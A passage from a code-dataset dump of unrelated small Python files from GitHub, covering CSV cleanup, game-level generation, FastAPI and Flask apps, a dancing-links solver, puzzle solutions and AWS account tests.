in dirs:\n\n    filepath = os.path.join(folderpath, str(direc), csvname + '.txt')\n\n    if os.path.exists(filepath):\n\n        #print(filepath)\n\n        f = open(filepath, \"r\",encoding = 'iso-8859-1')\n\n        readfile = csv.reader(f)\n\n        filelist = list(readfile)\n\n        f.close()\n\n        #print(len(filelist))\n\n        string = filelist[0][17]\n\n        str_only = ''.join(i for i in string if not i.isdigit())\n\n        num_only = int(re.search(r'\\d+', string).group())\n\n        #print(string)\n        #print(num_only)\n\n        title = filelist[0][:17]\n\n        title.append(str_only)\n\n        endlist = filelist[0][17:]\n\n        endlist[0] = num_only\n\n\n        #print(title)\n        #print(len(title))\n\n        #print(endlist)\n        #print(len(endlist))\n\n        filelist[0]= endlist\n        filelist.insert(0,title)\n\n        #print(filelist[0])\n\n        with open(filepath, \"w\") as myfile:\n            for item in filelist:\n                #print(item)\n                item[0] =str(item[0])\n                s=','\n                item = s.join(item)\n                #print(item)\n                myfile.write(\"%s\\n\" % item)\n\n\n        f = open(filepath, \"r\",encoding = 'iso-8859-1')\n\n        readfile = csv.reader(f)\n\n        filelist = list(readfile)\n\n        f.close()\n\n        #print(len(filelist))\n\n        j+=1\n\n        if j%1000 == 0:\n            print(j/length)\n","repo_name":"clam004/macroeyes_data_digestion","sub_path":"reorgmeds.py","file_name":"reorgmeds.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
+{"seq_id":"27240367348","text":"\r\ndef solid_object(id, pos, rot=0, scale=1, color=1004, groups=None, flipx=0, flipy=0, level=0, level2=0, zlayer=0, foreground=False):\r\n    string = [1, id, 2, pos[0], 3, pos[1]]\r\n    if flipx:\r\n        string += [4, 1]\r\n    if flipy:\r\n        string += [5, 1]\r\n    if not rot == 0:\r\n        string += [6, rot]\r\n    if not level == 0:\r\n        string += [20, level]\r\n    if not color == 1004:\r\n        string += [21, color]\r\n    if foreground:\r\n        string += [24, 5]\r\n    if not zlayer == 0:\r\n        string += [25, zlayer]\r\n    if not scale == 1:\r\n        string += [32, scale]\r\n    if not groups == None:\r\n        string += [57, '.'.join([str(e) for e in groups])]\r\n    if not level2 == 0:\r\n        string += [61, level2]\r\n    return ','.join([str(e) for e in string]) + ';'\r\n\r\ndef move_trigger(pos, length, target, movement):\r\n    string = [1, 901, 2, pos[0], 3, pos[1], 10, length, 28, movement[0], 29, movement[1], 30,11,51, target]\r\n    return ','.join([str(e) for e in string]) + ';'\r\n\r\n# rotates clockwise\r\ndef rot_trigger(pos, length, target, target2, degrees, easelvl):\r\n    times360 = int(degrees/360)\r\n    if abs(degrees) >= 360:\r\n        degrees = degrees%360\r\n    string = [1, 1346, 2, pos[0], 3, pos[1], 10, length, 68, degrees]\r\n    if not times360 == 0:\r\n        string += [69, times360]\r\n    if not easelvl == 1:\r\n        string += [30, 11, 85, easelvl]\r\n    return ','.join([str(e) for e in string]) + ';'","repo_name":"Metalit/GDRender","sub_path":"GD/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
+{"seq_id":"4145243230","text":"import pandas as pd\nimport time\nimport sqlite3\n\nkey = '1yRLGaQk3-9UlopftPr5e8F-X3pKkjwLlZWcTwai6_Ds'\nname = 'RRI+2.0+-+Masterlist'\nurl = 'https://docs.google.com/spreadsheets/d/{0}/gviz/tq?tqx=out:csv&sheet={1}'.format(key, name)\n\ndef create():\n    df = pd.read_csv(url)\n    df.drop('Number of filled cells', axis=1, inplace=True)\n    df.drop('Progress', axis=1, inplace=True)\n    df.drop(df.shape[0]-1, inplace=True)\n    df.drop(df.shape[0]-1, inplace=True)\n    df[\"Microplastic Sizes\"] = pd.to_numeric(df[\"Microplastic Sizes\"], errors=\"coerce\")
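\n    # Editor's note (illustrative, not from the original file): errors=\"coerce\" turns\n    # unparseable entries into NaN instead of raising, e.g.\n    #   pd.to_numeric(pd.Series([\"1.5\", \"n/a\"]), errors=\"coerce\") -> [1.5, NaN]\n    # and the fillna(\"NA\") below then replaces those NaN with the literal string \"NA\".\n    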
df[\"Year Published\"] = pd.to_numeric(df[\"Year Published\"], errors=\"coerce\")\n df.fillna(\"NA\", inplace=True)\n\n connection = sqlite3.connect(\"database/data.db\")\n df.to_sql(\"masterlist\", connection, if_exists='replace', index=True)\n cur = connection.cursor()\n res = cur.execute(\"SELECT * FROM masterlist LIMIT 1\")\n if res is not None:\n current = time.time()\n print(f\"Database init successfully at {time.ctime(current)}\")\n else:\n print(\"Something went wrong with initing database\")\n connection.close()","repo_name":"Marine-Litter-Research-Inventory/server","sub_path":"init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"73509882440","text":"#!/usr/bin/env python3\n\nimport re\nfrom collections import deque\n\n\ndef load_input():\n number_list = 9\n\n data = list()\n commands = list()\n\n pattern = re.compile('move (\\d+) from (\\d+) to (\\d+)')\n\n with open('input') as fd:\n data = [deque() for _ in range(number_list)]\n section = 0\n for line in fd:\n if section == 0:\n if line[1] == '1':\n section = 1\n continue\n for i in range(number_list):\n pos = 4*i+1\n if pos < len(line):\n char = line[pos]\n if char != ' ':\n data[i].appendleft(char)\n else:\n break\n elif section == 1:\n section = 2\n else:\n line = line.strip()\n match = pattern.search(line)\n commands.append([int(match.group(1)), int(match.group(2))-1, int(match.group(3))-1])\n\n return data, commands\n\n\ndef main():\n data, commands = load_input()\n\n # Task 1\n for command in commands:\n for _ in range(command[0]):\n temp = data[command[1]].pop()\n data[command[2]].append(temp)\n\n result = \"\".join([char[-1] for char in data])\n print(\"Result 1: \", result)\n\n # Task 2\n data, commands = load_input()\n for command in commands:\n temp = deque()\n for _ in range(command[0]):\n temp.appendleft(data[command[1]].pop())\n data[command[2]].extend(temp)\n\n result = \"\".join([char[-1] for char in data])\n print(\"Result 2: \", result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"docToolchain/aoc-2022","sub_path":"day05/python/ojuaf/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"63"} +{"seq_id":"71373209802","text":"from typing import Union\nfrom fastapi import FastAPI, HTTPException\nimport os.path\n\nif os.path.isfile('models.py'):\n from models import MessageIn, MessageOut, ChatRoomIn, ChatRoomOut, ChatRoomInfo\nelse :\n from chatroom_project.models import MessageIn, MessageOut, ChatRoomIn, ChatRoomOut, ChatRoomInfo\n\nimport uuid\nfrom datetime import datetime\n\napp = FastAPI()\n\n\nclass Message:\n def __init__(self, author: str, message):\n self.author = author\n self.message = message\n self.uid = str(uuid.uuid4())\n self.date = str(datetime.now())\nclass Chatroom:\n def __init__(self, name: str):\n self.uid = str(uuid.uuid4())\n self.name = name\n self.messages = []\n\nchatrooms: dict[str : Chatroom] = {}\n\n@app.post(\"/message/{room_id}\", tags=['message'])\ndef post_a_message(room_id: str, message: MessageIn):\n if room_id not in chatrooms:\n raise HTTPException(status_code=404, detail=\"Chatroom not found\")\n msg = Message(message.author, message.message)\n chatrooms[room_id].messages.append(MessageOut(uid=msg.uid, author=msg.author, message=msg.message, date=msg.date))\n return \"Message successfully sent!\"\n 
\n\n@app.get(\"/message/{room_id}\", tags=['message'])\ndef get_messages(room_id: str) -> ChatRoomOut:\n    room = chatrooms[room_id]\n    return ChatRoomOut(uid= room_id, name= room.name, messages= room.messages)\n\n@app.delete(\"/message/{message_id}\", tags=['message'])\ndef delete_a_message(message_id: str):\n    pass\n\n@app.delete(\"/chatroom/{room_id}\", tags=['chatroom'])\ndef delete_chatroom(room_id: str):\n    if room_id not in chatrooms:\n        raise HTTPException(status_code=404, detail=\"Chatroom not found\")\n    chatrooms.pop(room_id)\n    return \"Chatroom deleted successfully\"\n    \n@app.get(\"/chatroom\", tags=['chatroom'])\ndef get_chatrooms() -> list[ChatRoomInfo]:\n    chat_list = []\n    for room in chatrooms.values():\n        chat_list.append(ChatRoomInfo(uid= room.uid, name= room.name))\n    return chat_list\n\n@app.post(\"/chatroom\", tags=['chatroom'])\ndef create_a_chatroom(chatroom: ChatRoomIn):\n    room = Chatroom(chatroom.name)\n    chatrooms[room.uid] = room\n    return ChatRoomInfo(uid= room.uid, name= room.name)\n\n\n","repo_name":"theoliss/Intro_API","sub_path":"chatroom_project/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
+{"seq_id":"8524595432","text":"\"\"\"This script implements Knuth's 'dancing links' DLX algorithm for solving\r\nthe exact cover problem by backtracking\"\"\"\r\n\r\n# The basic idea is to represent the problem as a zero-one matrix.\r\n# The rows represent subsets of some set U and the columns represent\r\n# the elements of U, and a 1 in the matrix means set membership.\r\n# The problem is to find a family of subsets that partition U,\r\n# that is, to find a set of rows of the matrix so that each column\r\n# contains a 1 in exactly one row of the family. Alternatively, one may\r\n# ask for all such families, as Knuth does.
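\r\n#\r\n# Editor's illustrative example (added here; not from the original file): the small\r\n# instance from Knuth's paper, written in the row format the Dancer class below\r\n# expects -- member column names first, a symbolic row name last:\r\n#\r\n#     primary = ['A', 'B', 'C', 'D', 'E', 'F', 'G']\r\n#     matrix = [['C', 'E', 'F', 'r1'], ['A', 'D', 'G', 'r2'], ['B', 'C', 'F', 'r3'],\r\n#               ['A', 'D', 'r4'], ['B', 'G', 'r5'], ['D', 'E', 'G', 'r6']]\r\n#\r\n# Dancer(primary, matrix).solve() should then find exactly one cover, {r1, r4, r5}\r\n# (left commented out since this Python 2 era module also needs psyco at import time).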
\r\n\r\n# Knuth also considers an extension where some of the columns are\r\n# allowed to contain at most one 1.\r\n\r\n# The \"Dancing Links\" paper is available at\r\n# http://www-cs-faculty.stanford.edu/~uno/preprints.html\r\n\r\nimport time, psyco\r\n\r\nclass ColumnError(Exception):\r\n    def __init__(self, value):\r\n        self.value = value\r\n    def __str__(self):\r\n        return repr(self.value)\r\n\r\nclass Node:\r\n    \"\"\" A nonzero entry in the membership matrix\"\"\"\r\n    def __init__(self,left=None,right=None,up=None,down=None,col=None,row=None):\r\n        # all lists are circular in both directions\r\n        self.left = left    # the column name of the previous 1 in this row\r\n        self.right = right  # the column name of the next 1 in this row\r\n        self.up = up        # the row number of the previous 1 in this column\r\n        self.down = down    # the row number of the next 1 in this column\r\n        self.col = col      # the name of this column\r\n        self.row = row      # the number of this row (or possibly 'head')\r\n        \r\nclass Column:\r\n    \"\"\"The column headers\"\"\"\r\n    def __init__(self, next = None, prev = None):\r\n        self.prev = prev\r\n        self.next = next\r\n        self.length = 0 # number of 1's in this column\r\n\r\nclass Dancer:\r\n    \"\"\"The main class for dancing links.\r\n\r\n    Contains the sparse matrix and the methods for initializing it, backtracking\r\n    for a solution or all solutions, and outputting results.\"\"\"\r\n    \r\n    def __init__(self, primary, matrix, secondary = []):\r\n        if primary == []:\r\n            raise RuntimeError(\"No primary columns!\")\r\n        if matrix == []:\r\n            raise RuntimeError(\"No membership matrix\")\r\n        self.columns = primary + secondary\r\n        for row in matrix:\r\n            for col in row[:-1]:\r\n                if col not in self.columns:\r\n                    raise ColumnError(col)\r\n        self.nodes = {}\r\n        self.headers = {}\r\n        self.rows = {}\r\n        self.updates = 0\r\n        self.solutions = [] \r\n        \r\n        self.setHeaders(primary, secondary)\r\n        self.readRows(matrix) \r\n        psyco.bind(self.backTrack) \r\n        \r\n    def _recorder(self, level, choice):\r\n        \r\n        # Record solution. Not to be called outside class\r\n        \r\n        answer = []\r\n        rows = self.rows\r\n        \r\n        for idx in range(0, level+1):\r\n            num = choice[idx].row\r\n            answer += [rows[num]] \r\n        self.solutions.append(answer)\r\n        \r\n    def report(self):\r\n        # Print report. Intended to be called by class user.\r\n        pass\r\n        \r\n    def setHeaders(self, primary, secondary):\r\n        \"\"\"Sets up the header dictionary of column headers. The primary column headers form a\r\n        doubly-linked list, but the secondary column headers do not. This is because we do\r\n        not require that secondary columns be covered.\"\"\"\r\n        \r\n        headers = self.headers\r\n        nodes = self.nodes\r\n        headers['root'] = Column()\r\n        curCol = 'root'\r\n        for p in primary:\r\n            headers[curCol].next = p\r\n            headers[p] = Column(prev = curCol)\r\n            curCol = p\r\n            nodes['head', p] = Node(up = 'head', down = 'head', col = curCol, row = 'head')\r\n        headers[curCol].next = 'root'\r\n        headers['root'].prev = curCol\r\n        for s in secondary:\r\n            headers[s] = Column(prev = s, next = s)\r\n            nodes['head', s] = Node(up = 'head', down = 'head', col = curCol, row = 'head')\r\n\r\n    def readRows(self, matrix):\r\n        \"\"\"Initialize the membership matrix.\r\n\r\n        The input is a list of rows. 
The rows are simply the names of the columns with a\r\n        1 in this row, except that the last entry in each row is a symbolic name for the row.\r\n        The columns must be listed in the same order as in the primary\r\n        and secondary inputs, primary columns first.\"\"\"\r\n\r\n        nodes = self.nodes\r\n        rows = self.rows\r\n        headers = self.headers\r\n        \r\n        for rowNum, row in enumerate(matrix):\r\n            rows[rowNum] = row[-1]\r\n            for i, c in enumerate(row[:-1]):\r\n                c = row[i]\r\n                h = nodes['head', c]\r\n                next = row[i+1] # wrong for the last 1 in the row\r\n                \r\n                # h.up points to last element in the column\r\n                nodes[rowNum, c] = Node(row[i-1],next, h.up, 'head', c, rowNum)\r\n                \r\n                # hook the new node in at the bottom of the column\r\n                # note that this will handle the first node in the column\r\n                \r\n                nodes[h.up, c].down = rowNum \r\n                h.up = rowNum\r\n                headers[c].length += 1\r\n                \r\n            # hook first and last 1s in row together\r\n            \r\n            nodes[rowNum, c].right = row[0]\r\n            nodes[rowNum, row[0]].left = row[-2]\r\n\r\n    def backTrack(self, findAll):\r\n        \"\"\"The main routine.\r\n\r\n        Returns the number of solutions found\"\"\"\r\n        \r\n        # Knuth's comments in his dance program say, in part, \"Our strategy for generating all\r\n        # exact covers will be to repeatedly choose always the column that appears to be\r\n        # hardest to cover, namely, the column with the shortest list, from all columns that\r\n        # still need to be covered. And we explore all possibilities via depth-first search.\r\n        # ...\r\n        # The basic operation is 'covering a column.' This means removing it from the list of\r\n        # columns needing to be covered, and 'blocking' its rows: removing nodes from other\r\n        # lists whenever they belong to a row of a node in this column's list.\"\r\n        #\r\n        # This implementation is a little clunky, since I've translated Knuth's dance.c\r\n        # program as literally as I can, and python lacks a goto. I've simulated gotos\r\n        # by setting a state variable. 
Many of the comments are copied from Knuth.\r\n\r\n        level = 0   # number of choices in current partial solution\r\n        choice = {}\r\n        # the list of such choices, for printing solution, or backtracking\r\n        count = 0   # number of solutions\r\n        \r\n        state = 'forward'\r\n        nodes = self.nodes\r\n        headers = self.headers\r\n        root = headers['root']\r\n        \r\n        while True:\r\n\r\n            # forward:\r\n\r\n            if state == 'forward':\r\n                # Set best to best column for branching (one with fewest elements)\r\n                minLength = 10000000 # infinity\r\n                cur = root.next\r\n                \r\n                while cur != 'root':\r\n                    h = headers[cur]\r\n                    if h.length < minLength:\r\n                        best = cur\r\n                        minLength = h.length\r\n                    cur = h.next\r\n                self.cover(best)\r\n                choice[level] = nodes[nodes['head', best].down, best]\r\n                currNode = choice[level]\r\n\r\n            #advance:\r\n\r\n            if currNode.row == 'head':\r\n                state = 'backup' # goto backup\r\n            else:\r\n                \r\n                #cover all other columns of currNode\r\n\r\n                pp = nodes[currNode.row, currNode.right]\r\n                while pp.col != best:\r\n                    self.cover(pp.col) \r\n                    pp = nodes[pp.row, pp.right]\r\n                if headers['root'].next == 'root':\r\n\r\n                    # record solution\r\n                    \r\n                    self._recorder(level, choice)\r\n                    count += 1\r\n                    \r\n                    if findAll:\r\n                        state = 'recover' # goto recover\r\n                    else:\r\n                        break # done\r\n                else:\r\n                    level += 1\r\n                    state = 'forward'\r\n                    continue # goto forward\r\n\r\n            #backup:\r\n\r\n            if state == 'backup':\r\n                self.uncover(best)\r\n                if level == 0:\r\n                    break # done\r\n                level -= 1\r\n                currNode = choice[level]\r\n                best = currNode.col\r\n\r\n            #recover: ( backup falls through to here ) \r\n\r\n            if state in ('backup', 'recover'):\r\n                \r\n                # uncover all other columns of currNode\r\n                # We included left links, thereby making the list doubly linked, so that columns\r\n                # would be uncovered in the correct LIFO order in this part of the program. -- Knuth\r\n                \r\n                pp = nodes[currNode.row, currNode.left]\r\n                while pp.col != best:\r\n                    self.uncover(pp.col)\r\n                    pp = nodes[pp.row, pp.left]\r\n                currNode = choice[level] = nodes[currNode.down, currNode.col]\r\n                state = 'advance' # goto advance\r\n        return count\r\n\r\n    def cover(self, col):\r\n        \"\"\"When a row is blocked, it leaves all lists except the list of the column that is being\r\n        covered. Thus, a node is never removed from a list twice. -- Knuth\"\"\"\r\n        \r\n        updates = 1\r\n        nodes = self.nodes\r\n        headers = self.headers\r\n        left = headers[col].prev\r\n        right = headers[col].next\r\n        headers[left].next = right # remove col from the headers list\r\n        headers[right].prev = left\r\n        rr = nodes['head', col].down # next row in column \r\n        while nodes[rr, col].row != 'head':\r\n            nn = nodes[rr, nodes[rr, col].right] # next column in row rr\r\n            while nn.col != col:\r\n                uu = nn.up\r\n                dd = nn.down\r\n                cc = nn.col\r\n                nodes[uu, cc].down = dd\r\n                nodes[dd, cc].up = uu # remove node from the column\r\n                headers[cc].length -= 1\r\n                try:\r\n                    nn = nodes[nn.row, nn.right] #next column\r\n                except KeyError:\r\n                    raise KeyError((nn.row, nn.col))\r\n                updates += 1\r\n            rr = nodes[rr, col].down # next row\r\n        self.updates += updates\r\n\r\n    def uncover(self, col):\r\n        \"\"\"Uncovering is done in precisely the reverse order. The pointers thereby execute an\r\n        exquisitely choreographed dance which returns them almost magically to their former\r\n        state. 
-- Knuth\"\"\"\r\n\r\n nodes = self.nodes\r\n headers = self.headers\r\n rr = nodes['head', col].up # next row in column\r\n while nodes[rr, col].row != 'head':\r\n nn = nodes[rr, nodes[rr, col].left] # next column in row rr\r\n while nn.col != col:\r\n uu = nn.up\r\n dd = nn.down\r\n cc = nn.col\r\n nodes[uu, cc].down = nodes[dd, cc].up = nn.row\r\n headers[cc].length += 1\r\n nn = nodes[nn.row, nn.left] #next column\r\n rr = nodes[rr, col].up # next row\r\n left = headers[col].prev\r\n right = headers[col].next\r\n headers[left].next = headers[right].prev = col #put col back into headers list\r\n \r\n def report(self):\r\n\r\n # Print report. Intended to be called by class user.\r\n \r\n return self.solutions\r\n \r\n def solve(self, findAll = True):\r\n start = time.clock()\r\n count = self.backTrack(findAll)\r\n elapsed = time.clock() - start\r\n return count, elapsed, self.updates\r\n \r\n","repo_name":"rdasxy/kenken","sub_path":"misc/dance1.py","file_name":"dance1.py","file_ext":"py","file_size_in_byte":12291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36636580315","text":"import logging as log\nimport optparse as op\nimport os\nimport shutil\n\nif \"__main__\" == __name__:\n # SETUP LOGGER BEFORE IMPORTS SO THEY CAN USE THESE SETTINGS\n log.basicConfig(filename=\"poster-to-season.log\",\n filemode=\"w\",\n format=\"%(asctime)s %(filename)15.15s %(funcName)15.15s %(levelname)5.5s %(lineno)4.4s %(message)s\",\n datefmt=\"%Y%m%d %H%M%S\"\n )\n log.getLogger().setLevel(log.DEBUG)\n\n\ndef parse_command_line() -> op.Values:\n parser = op.OptionParser()\n parser.add_option(\"-p\", \"--poster\",\n dest=\"poster_file\",\n help=\"File to use as poster for the season.\"\n )\n parser.add_option(\"-s\", \"--season\",\n dest=\"season_dir\",\n help=\"Directory the videos for the season are located.\"\n )\n options, _ = parser.parse_args()\n\n if not options.poster_file:\n parser.error(\"Filename of poster is missing.\")\n if not options.season_dir:\n parser.error(\"Season directory is missing.\")\n\n if not os.path.isfile(options.poster_file):\n parser.error(f\"Cannot find image file {options.poster_file}.\")\n if not os.path.isdir(options.season_dir):\n parser.error(f\"Cannot find directory {options.season_dir}.\")\n\n return options\n\n\ndef main() -> None:\n options: op.Values = parse_command_line()\n dot_idx: int = options.poster_file.rfind(\".\")\n # FILE EXTENSION OF POSTER (INCLUDING THE PERIOD)\n poster_ext: str = options.poster_file[dot_idx:]\n\n for file_name in sorted(os.listdir(options.season_dir)):\n if file_name.endswith(\".mp4\") or file_name.endswith(\".mkv\"):\n print(f\"Copying poster for {file_name}\")\n # build poster filename\n poster_file_name: str = f\"{file_name[:-4]}{poster_ext}\"\n poster_full_path: str = os.path.join(options.season_dir, poster_file_name)\n log.debug(f\"Copying {options.poster_file} to {poster_full_path}.\")\n shutil.copyfile(options.poster_file, poster_full_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alkirej/python-utils-for-media-server","sub_path":"src/poster_to_season.py","file_name":"poster_to_season.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25295295597","text":"#!/usr/bin/env python3\n\nimport sys\nfrom collections import defaultdict\n\nsys.setrecursionlimit(2 * (10 ** 5))\nInf = INF = float(\"INF\")\n\n\ndef solve(N: int, A: \"List[int]\", B: 
\"List[int]\"):\n links = defaultdict(list)\n for a, b in zip(A, B):\n links[a].append(b)\n links[b].append(a)\n\n lst = []\n\n def dfs(u, p):\n lst.append(u)\n for v in sorted(links[u]):\n if v == p:\n continue\n dfs(v, u)\n lst.append(u)\n\n dfs(1, None)\n print(*lst)\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n A = [int()] * (N - 1) # type: \"List[int]\"\n B = [int()] * (N - 1) # type: \"List[int]\"\n for i in range(N - 1):\n A[i] = int(next(tokens))\n B[i] = int(next(tokens))\n solve(N, A, B)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dmiyakawa/atcoder-workspace","sub_path":"abc213/D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40850672600","text":"#!/usr/bin/env python3 \n\n# -- Imports\nimport argparse\n#import json\n#import sys\n#import getpass\n#import getopt\n#import getpass\n#import json\n#import os\n#import re\n#import sys\n#import urllib\n#import urllib.parse\n#import urllib.request\n#import xml.etree.ElementTree as ET\n#import subprocess\n#import threading\n#import queue\n# -- Input args\nparser = argparse.ArgumentParser(description='Argparse example')\nparser.add_argument('-d','--dir', help='Some XML file', required=True)\nargs = parser.parse_args()\n\n\n\nimport sys\nimport hashlib\n\ndef hash(file):\n\t# BUF_SIZE is totally arbitrary, change for your app!\n\tBUF_SIZE = 65536 # lets read stuff in 64kb chunks!\n\t#md5 = hashlib.md5()\n\tsha1 = hashlib.sha1()\n\twith open(file, 'rb') as f:\n\t\twhile True:\n\t\t\tdata = f.read(BUF_SIZE)\n\t\t\tif not data:\n\t\t\t\t\tbreak\n\t\t\t#md5.update(data)\n\t\t\tsha1.update(data)\n\treturn sha1.hexdigest()\n\nimport os\nfor root, dirs, files in os.walk(args.dir):\n for file in files:\n path = os.path.join(root, file)\n np = os.path.join(root,\"{}.{}\".format(hash(path),os.path.splitext(path)[1]))\n print(\"{} --> {}\".format(path,np))\n os.rename(path,np)\n\n","repo_name":"mikrofyr/playground","sub_path":"usr/lib/python/misc/uniq.py","file_name":"uniq.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"39754147743","text":"from flask import Flask, request, render_template,jsonify\r\nfrom flask_cors import CORS,cross_origin\r\nfrom src.pipeline.predict_pipeline import CustomData, PredictPipeline\r\nimport pandas as pd\r\n\r\napplication = Flask(__name__)\r\n\r\napp = application\r\n\r\n@app.route('/')\r\n@cross_origin()\r\ndef home_page():\r\n return render_template('index.html')\r\n\r\n@app.route('/predict',methods=['GET','POST'])\r\n@cross_origin()\r\ndef predict_datapoint():\r\n if request.method == 'GET':\r\n return render_template('index.html')\r\n else:\r\n Order_date = request.form['Order_date']\r\n Order_time= request.form['Order_time']\r\n Time_order_picked = request.form['Time_order_picked']\r\n\r\n data = CustomData(\r\n Delivery_person_Age = float(request.form.get('Delivery_person_Age')),\r\n Delivery_person_Ratings = float(request.form.get('Delivery_person_Ratings')),\r\n Restaurant_latitude = float(request.form.get('Restaurant_latitude')),\r\n Restaurant_longitude = float(request.form.get('Restaurant_longitude')),\r\n Delivery_location_latitude = float(request.form.get('Delivery_location_latitude')),\r\n Delivery_location_longitude = 
float(request.form.get('Delivery_location_longitude')),\r\n Weather_conditions = request.form.get('Weather_conditions'),\r\n Road_traffic_density= request.form.get('Road_traffic_density'),\r\n Vehicle_condition = request.form.get('Vehicle_condition'),\r\n Type_of_order = request.form.get('Type_of_order'),\r\n Type_of_vehicle = request.form.get('Type_of_vehicle'),\r\n multiple_deliveries = request.form.get('multiple_deliveries'),\r\n Festival= request.form.get('Festival'),\r\n City = request.form.get('City'),\r\n Order_month = int(pd.to_datetime(Order_date,format=\"%Y-%m-%dT%H:%M\").month),\r\n Order_day = int(pd.to_datetime(Order_date,format=\"%Y-%m-%dT%H:%M\").day),\r\n Order_hour= int(pd.to_datetime(Order_time,format=\"%Y-%m-%dT%H:%M\").hour),\r\n Order_min = int(pd.to_datetime(Order_time,format=\"%Y-%m-%dT%H:%M\").minute),\r\n Hour_order_pk = int(pd.to_datetime(Time_order_picked,format=\"%Y-%m-%dT%H:%M\").hour),\r\n Min_order_pk = int(pd.to_datetime(Time_order_picked,format=\"%Y-%m-%dT%H:%M\").minute)\r\n )\r\n\r\n pred_df = data.get_data_as_dataframe()\r\n \r\n print(pred_df)\r\n\r\n predict_pipeline = PredictPipeline()\r\n pred = predict_pipeline.predict(pred_df)\r\n results = round(pred[0],2)\r\n return render_template('result.html',results=results,pred_df = pred_df)\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"acaaattunde2012/Ecommerce-Delivery-Time-Predictor-With-Full-Deployment","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16389055222","text":"# http://www.pythonchallenge.com/pc/return/italy.html\n\nimport Image\nim = Image.open('wire.png')\nim_new = Image.new(im.mode, (100, 100))\ndata = list(im.getdata())\nidx = 0\nx = y = top = left = 0\nbottom = right = 99\ndirection = 'R' # R=right, L=left, D=down, U=up\nwhile idx < 10000:\n im_new.putpixel((x,y), data[idx])\n idx += 1\n if direction == 'R':\n if x == right:\n top += 1\n y += 1\n direction = 'D'\n else:\n x += 1\n elif direction == 'D':\n if y == bottom:\n right -= 1\n x -= 1\n direction = 'L'\n else:\n y += 1\n elif direction == 'L':\n if x == left:\n bottom -= 1\n y -= 1\n direction = 'U'\n else:\n x -= 1\n elif direction == 'U':\n if y == top:\n left += 1\n x += 1\n direction = 'R'\n else:\n y -= 1\nim_new.show()\n","repo_name":"haiwenzhu/pythonchallenge","sub_path":"14/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25418971122","text":"import os\nimport unittest\n\nfrom zope import component\n\nfrom ..testing import AWS_ACCOUNT_INTEGRATION_LAYER\nfrom ..interfaces import IAccount\nfrom ..account import Account, account_factory\nfrom ..session import Session\n\n\nclass IntegrationTestAWSAccountAccount(unittest.TestCase):\n\n level = 2\n\n def setUp(self):\n self.session_kwargs = {'aws_access_key_id': os.environ.get('AWS_ACCESS_KEY_ID'),\n 'aws_secret_access_key': os.environ.get('AWS_SECRET_ACCESS_KEY')}\n self.assume_role_kwargs = {'sts_method': 'assume_role',\n 'RoleArn': os.environ.get('AWS_ASSUME_ROLE'),\n 'RoleSessionName': 'testing_assume_role_for_cs_aws_account_package'\n }\n self.session = Session(**self.session_kwargs)\n\n def test_account_id(self):\n acct = Account(self.session)\n self.assertGreater(len(acct.account_id()), 0)\n\n def test_account_alias(self):\n acct = 
Account(self.session)\n self.assertGreater(len(acct.alias()), 0)\n\n def test_account_aliases(self):\n acct = Account(self.session)\n self.assertEqual(len(acct._cache_aliases), 0)\n self.assertGreater(len(acct.aliases()), 0)\n self.assertEqual(len(acct._cache_aliases), 1)\n\n def test_account_session(self):\n acct = Account(self.session)\n self.assertIs(acct.session(), self.session)\n\n def test_caching_factory(self):\n s1 = account_factory(SessionParameters=self.session_kwargs)\n s2 = account_factory(SessionParameters=self.session_kwargs)\n self.assertIs(s1, s2)\n\n\nclass IntegrationTestAWSAccountAccountZCA(unittest.TestCase):\n layer = AWS_ACCOUNT_INTEGRATION_LAYER\n\n def setUp(self):\n self.session_kwargs = {'aws_access_key_id': os.environ.get('AWS_ACCESS_KEY_ID'),\n 'aws_secret_access_key': os.environ.get('AWS_SECRET_ACCESS_KEY')}\n\n def test_account_factories(self):\n s = component.createObject(u\"cs.aws_account.session\", SessionParameters=self.session_kwargs)\n a = component.createObject(u\"cs.aws_account.account\", s)\n self.assertTrue(IAccount.providedBy(a))\n a1 = component.createObject(u\"cs.aws_account.cached_account\", SessionParameters=self.session_kwargs)\n self.assertTrue(IAccount.providedBy(a1))\n a2 = component.createObject(u\"cs.aws_account.cached_account\", SessionParameters=self.session_kwargs)\n self.assertIs(a1, a2)\n","repo_name":"CrowdStrike/cs.aws_account","sub_path":"cs/aws_account/tests/test_account.py","file_name":"test_account.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"37141625279","text":"\"\"\"\ninput :\n7 